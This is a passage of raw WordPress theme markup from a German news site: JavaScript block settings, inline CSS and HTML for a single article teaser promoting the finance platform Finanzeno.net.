ory_padding1":"0","modules_category_padding2":"0","modules_cat_border1":"0","modules_cat_border2":"0","cat_bg2":"rgba(255,255,255,0)","cat_txt2":"#ec3535","author_photo_radius1":"100%","author_photo_radius2":"100%","review_size2":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta1_font_family":"653","f_meta2_font_family":"653","f_meta1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta1_font_line_height":"1","f_meta1_font_weight":"500","f_meta2_font_weight":"500","f_meta1_font_transform":"capitalize","f_meta2_font_transform":"capitalize","f_meta1_font_spacing":"-0.5","meta_info_align1":"","meta_padding1":"eyJhbGwiOiIyMHB4IDAiLCJsYW5kc2NhcGUiOiIxNXB4IDAiLCJwb3J0cmFpdCI6IjEycHggMCIsInBob25lIjoiMjBweCAwIDAifQ==","show_author1":"eyJsYW5kc2NhcGUiOiJub25lIiwicG9ydHJhaXQiOiJub25lIn0=","show_com1":"none","show_excerpt1":"none","modules_border_size1":"eyJhbGwiOiIwIDAgMXB4IDAiLCJwaG9uZSI6IjAifQ==","show_cat1":"none","show_cat2":"none","author_photo":"yes","f_title2_font_size":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMyJ9","f_title2_font_line_height":"1.2","f_meta2_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta2_font_line_height":"1","f_meta2_font_spacing":"-0.5","all_underline_color1":"","author_txt":"#000000","author_txt_hover":"#ec3535","date_txt":"#000000","all_underline_color2":"","date_txt2":"#000000","cat_bg_hover":"rgba(255,255,255,0)","author_photo_radius":"100%","review_size":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta_font_family":"653","f_meta_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_transform":"capitalize","f_meta_font_spacing":"-0.5","image_width":"eyJhbGwiOiI1MCIsInBob25lIjoiMTAwIn0=","excl_margin":"eyJhbGwiOiItNHB4IDEwcHggMCAwIiwicG9ydHJhaXQiOiItMnB4IDhweCAwIDAifQ==","excl_padd":"4px 6px","excl_radius":"2","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","f_excl_font_transform":"uppercase","f_excl_font_weight":"600","f_excl_font_family":"653","f_excl_font_size":"eyJhbGwiOiIxMiIsInBvcnRyYWl0IjoiMTEiLCJsYW5kc2NhcGUiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_line_height":"1","f_ex_font_family":"653","f_ex_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTQiLCJsYW5kc2NhcGUiOiIxNSIsInBob25lIjoiMTUifQ==","f_ex_font_line_height":"1.4","f_ex_font_weight":"500","ex_txt":"#000000","f_cat_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIiLCJsYW5kc2NhcGUiOiIxMiIsInBob25lIjoiMTIifQ==","f_cat_font_line_height":"1","cat_txt_hover":"#ec3535","limit":"1","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","mc1_el":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_font_spacing":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_extra_cat":"","author_photo_size":"","author_photo_space":"","show_review":"inline-block","review_space":"","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_style":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":1,"header_color":"","color_preset":"","border_top":"","class":"tdi_199","tdc_css_class":"tdi_199","tdc_css_class_style":"tdi_199_rand_style"}';
  2209. block_tdi_199.td_column_number = "1";
  2210. block_tdi_199.block_type = "td_flex_block_1";
  2211. block_tdi_199.post_count = "1";
  2212. block_tdi_199.found_posts = "3784";
  2213. block_tdi_199.header_color = "";
  2214. block_tdi_199.ajax_pagination_infinite_stop = "";
  2215. block_tdi_199.max_num_pages = "3784";
  2216. tdBlocksArray.push(block_tdi_199);
  2217. </script><div class="td-block-title-wrap"></div><div id=tdi_199 class="td_block_inner td-mc1-wrap">
  2218.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  2219.            <div class="td-module-container td-category-pos-">
  2220.                                    <div class="td-image-container">
  2221.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg"  ></span></a></div>                                                                    </div>
  2222.                
  2223.                <div class="td-module-meta-info">
  2224.                                        
  2225.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>
  2226.                    
  2227.                                            <div class="td-editor-date">
  2228.                                                        <a href="https://nachrichtenmorgen.de/category/finanzen-und-vertrag/" class="td-post-category">Finanzen und Vertrag</a>
  2229.                                                            <span class="td-author-date">
  2230.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-06T17:15:57+02:00" >Mai 6, 2024</time></span>                                                                                                        </span>
  2231.                                                    </div>
  2232.                    
  2233.                    <div class="td-excerpt">Finanzeno.net, ein führender Name im Finanzdienstleistungssektor, setzt weiterhin hohe Maßstäbe mit seinen neuesten Angeboten im Bereich der Online-Finanzplattformen. Diese Plattformen sind sorgfältig konzipiert, um...</div>
  2234.                    
  2235.                                    </div>
  2236.            </div>
  2237.        </div>
  2238.  
  2239.        </div></div><div class="td_block_wrap td_flex_block_1 tdi_200 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_200" >
  2240. <style>.tdi_200{margin-bottom:0px!important;border-color:#eaeaea!important;border-style:solid!important;border-width:0!important}@media (min-width:1019px) and (max-width:1140px){.tdi_200{margin-bottom:20px!important;padding-bottom:18px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_200{margin-bottom:18px!important;padding-bottom:15px!important}}@media (max-width:767px){.tdi_200{margin-bottom:40px!important}}</style>
  2241. <style>.tdi_200 .td-image-wrap{padding-bottom:70%}.tdi_200 .entry-thumb{background-position:center 50%}.tdi_200 .td-module-container{flex-direction:column;border-color:#eaeaea!important}.tdi_200 .td-image-container{display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_200 .td-module-meta-info,.ie11 .tdi_200 .td-module-meta-info{flex:auto}body .tdi_200 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_200 .td-module-meta-info{padding:16px 0 0 0;border-color:#eaeaea}.tdi_200 .td_module_wrap{width:33.33333333%;float:left;padding-left:10px;padding-right:10px;padding-bottom:10px;margin-bottom:10px}.rtl .tdi_200 .td_module_wrap{float:right}.tdi_200 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_200 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_200 .td-post-vid-time{display:block}.tdi_200 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa}.tdi_200 .td-post-category:not(.td-post-extra-category){display:none}.tdi_200 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:100%}.tdi_200 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_200 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_200 .td-read-more{display:none}.tdi_200 .td-author-date{display:inline}.tdi_200 .entry-review-stars{display:inline-block}.tdi_200 .td-icon-star,.tdi_200 .td-icon-star-empty,.tdi_200 .td-icon-star-half{font-size:15px}.tdi_200 .td-module-comments{display:none}.tdi_200 .td_module_wrap:nth-child(3n+1){clear:both}.tdi_200 .td_module_wrap:nth-last-child(-n+3){margin-bottom:0;padding-bottom:0}.tdi_200 .td_module_wrap:nth-last-child(-n+3) .td-module-container:before{display:none}.tdi_200 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_200 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_200 .td-post-author-name a{color:#000000}.tdi_200 .td-post-author-name:hover a{color:#ec3535}.tdi_200 .td-post-date,.tdi_200 .td-post-author-name span{color:#000000}.tdi_200 .td-module-meta-info,.tdi_200 .td-next-prev-wrap{text-align:left}.tdi_200 .td-category-pos-above .td-post-category{align-self:flex-start!important}.tdi_200 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_200 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_200 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_200 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_200 .entry-title{margin:0 0 8px 0;font-family:Work Sans!important;font-size:16px!important;line-height:1.2!important;font-weight:600!important}.tdi_200 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_200 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}.tdi_200 .td-editor-date,.tdi_200 .td-editor-date .td-post-author-name a,.tdi_200 .td-editor-date .entry-date,.tdi_200 .td-module-comments a{font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_200 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_200 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_200 .td-module-meta-info{padding:14px 0 0 0}.tdi_200 .td_module_wrap{padding-left:7.5px;padding-right:7.5px;padding-bottom:7.5px;margin-bottom:7.5px;clear:none!important;padding-bottom:7.5px!important;margin-bottom:7.5px!important}.tdi_200 .td_block_inner{margin-left:-7.5px;margin-right:-7.5px}.tdi_200 .td-module-container:before{bottom:-7.5px}.tdi_200 .td-post-author-name{display:none}.tdi_200 .td_module_wrap:nth-child(3n+1){clear:both!important}.tdi_200 .td_module_wrap:nth-last-child(-n+3){margin-bottom:0!important;padding-bottom:0!important}.tdi_200 .td_module_wrap .td-module-container:before{display:block!important}.tdi_200 .td_module_wrap:nth-last-child(-n+3) .td-module-container:before{display:none!important}.tdi_200 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_200 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_200 .entry-title{margin:0 0 6px 0;font-size:14px!important}@media (min-width:768px){.tdi_200 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_200 .td-module-meta-info{padding:12px 0 0 0}.tdi_200 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:5px;margin-bottom:5px;clear:none!important;padding-bottom:5px!important;margin-bottom:5px!important}.tdi_200 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_200 .td-module-container:before{bottom:-5px}.tdi_200 .td-post-author-name{display:none}.tdi_200 .td-icon-star,.tdi_200 .td-icon-star-empty,.tdi_200 .td-icon-star-half{font-size:10px}.tdi_200 .td_module_wrap:nth-child(3n+1){clear:both!important}.tdi_200 .td_module_wrap:nth-last-child(-n+3){margin-bottom:0!important;padding-bottom:0!important}.tdi_200 .td_module_wrap .td-module-container:before{display:block!important}.tdi_200 .td_module_wrap:nth-last-child(-n+3) .td-module-container:before{display:none!important}.tdi_200 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_200 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_200 .entry-title{margin:0 0 4px 0;font-size:13px!important}.tdi_200 .td-editor-date,.tdi_200 .td-editor-date .td-post-author-name a,.tdi_200 .td-editor-date .entry-date,.tdi_200 .td-module-comments a{font-size:12px!important}@media (min-width:768px){.tdi_200 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_200 .td-module-meta-info{max-width:100%}.tdi_200 .td_module_wrap{width:100%;float:left;padding-left:0px;padding-right:0px;padding-bottom:15px;margin-bottom:15px;padding-bottom:15px!important;margin-bottom:15px!important}.rtl .tdi_200 .td_module_wrap{float:right}.tdi_200 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_200 .td-module-container:before{bottom:-15px}.tdi_200 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_200 .td_module_wrap .td-module-container:before{display:block!important}.tdi_200 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_200 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_200 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_200 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_200 = new tdBlock();
  2242. block_tdi_200.id = "tdi_200";
  2243. block_tdi_200.atts = '{"modules_on_row":"eyJhbGwiOiIzMy4zMzMzMzMzMyUiLCJwaG9uZSI6IjEwMCUifQ==","limit":"9","modules_category":"above","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUiLCJhbGwiOiJub25lIn0=","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTMiLCJsYW5kc2NhcGUiOiIxNCJ9","f_title_font_line_height":"1.2","show_cat":"none","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIxNnB4IDAgMCAwIiwibGFuZHNjYXBlIjoiMTRweCAwIDAgMCIsInBvcnRyYWl0IjoiMTJweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJib3JkZXItY29sb3IiOiIjZWFlYWVhIiwiZGlzcGxheSI6IiJ9LCJsYW5kc2NhcGUiOnsibWFyZ2luLWJvdHRvbSI6IjIwIiwicGFkZGluZy1ib3R0b20iOiIxOCIsImRpc3BsYXkiOiIifSwibGFuZHNjYXBlX21heF93aWR0aCI6MTE0MCwibGFuZHNjYXBlX21pbl93aWR0aCI6MTAxOSwicG9ydHJhaXQiOnsibWFyZ2luLWJvdHRvbSI6IjE4IiwicGFkZGluZy1ib3R0b20iOiIxNSIsImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsibWFyZ2luLWJvdHRvbSI6IjQwIiwiZGlzcGxheSI6IiJ9LCJwaG9uZV9tYXhfd2lkdGgiOjc2N30=","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"70","all_modules_space":"eyJwaG9uZSI6IjMwIiwicG9ydHJhaXQiOiIxMCIsImFsbCI6IjIwIiwibGFuZHNjYXBlIjoiMTUifQ==","art_excerpt":"0","art_title":"eyJsYW5kc2NhcGUiOiIwIDAgNnB4IDAiLCJwb3J0cmFpdCI6IjAgMCA0cHggMCIsImFsbCI6IjAgMCA4cHggMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"","show_author":"eyJwb3J0cmFpdCI6Im5vbmUiLCJsYW5kc2NhcGUiOiJub25lIn0=","mc1_el":"10","f_title_font_family":"653","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#ec3535","cat_bg":"rgba(255,255,255,0)","modules_category_padding":"0","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_category_margin":"0","modules_cat_border":"0","columns":"33.33333333%","columns_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_space1":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMiIsInBob25lIjoiMzAifQ==","hide_image3":"yes","image_height1":"70","modules_space2":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE2IiwicG9ydHJhaXQiOiIxMCJ9","meta_padding2":"0","art_title1":"eyJhbGwiOiIwIDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMCAwIDEwcHgiLCJwb3J0cmFpdCI6IjAgMCA4cHgifQ==","art_title2":"eyJhbGwiOiIwIDAgOHB4IDAiLCJwb3J0cmFpdCI6IjAiLCJsYW5kc2NhcGUiOiIwIDAgNnB4IDAifQ==","f_title1_font_family":"456","f_title2_font_family":"653","f_title1_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjE5IiwicG9ydHJhaXQiOiIxNyJ9","f_title1_font_line_height":"1.1","f_title1_font_weight":"600","f_title2_font_weight":"600","f_title1_font_transform":"","f_title2_font_transform":"","title_txt2":"#000000","title_txt_hover2":"#f43f3f","show_excerpt2":"none","show_com2":"none","show_date2":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","show_author2":"none","modules_category3":"","modules_category_margin1":"0","modules_category_margin2":"0","modules_category_padding1":"0","modules_category_padding2":"0","modules_cat_border1":"0","modules_cat_border2":"0","cat_bg2":"rgba(255,255,255,0)","cat_txt2":"#ec3535","author_photo_radius1":"100%","author_photo_radius2":"100%","review_size2":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta1_font_family":"653","f_meta2_font_family":"653","f_meta1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta1_font_line_height":"1","f_meta1_font_weight":"500","f_meta2_font_weight":"500","f_meta1_font_transform":"capitalize","f_meta2_font_transform":"capitalize","f_meta1_font_spacing":"-0.5","meta_info_align1":"","meta_padding1":"eyJhbGwiOiIyMHB4IDAiLCJsYW5kc2NhcGUiOiIxNXB4IDAiLCJwb3J0cmFpdCI6IjEycHggMCIsInBob25lIjoiMjBweCAwIDAifQ==","show_author1":"eyJsYW5kc2NhcGUiOiJub25lIiwicG9ydHJhaXQiOiJub25lIn0=","show_com1":"none","show_excerpt1":"none","modules_border_size1":"eyJhbGwiOiIwIDAgMXB4IDAiLCJwaG9uZSI6IjAifQ==","show_cat1":"none","show_cat2":"none","author_photo":"yes","f_title2_font_size":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMyJ9","f_title2_font_line_height":"1.2","f_meta2_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta2_font_line_height":"1","f_meta2_font_spacing":"-0.5","all_underline_color1":"","author_txt":"#000000","author_txt_hover":"#ec3535","date_txt":"#000000","all_underline_color2":"","date_txt2":"#000000","author_photo_radius":"100%","review_size":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta_font_family":"653","f_meta_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_transform":"capitalize","f_meta_font_spacing":"-0.5","excl_padd":"3px 5px","excl_margin":"-4px 5px 0 0","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_radius":"2","offset":"1","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_width":"","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo_size":"","author_photo_space":"","show_review":"inline-block","review_space":"","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax 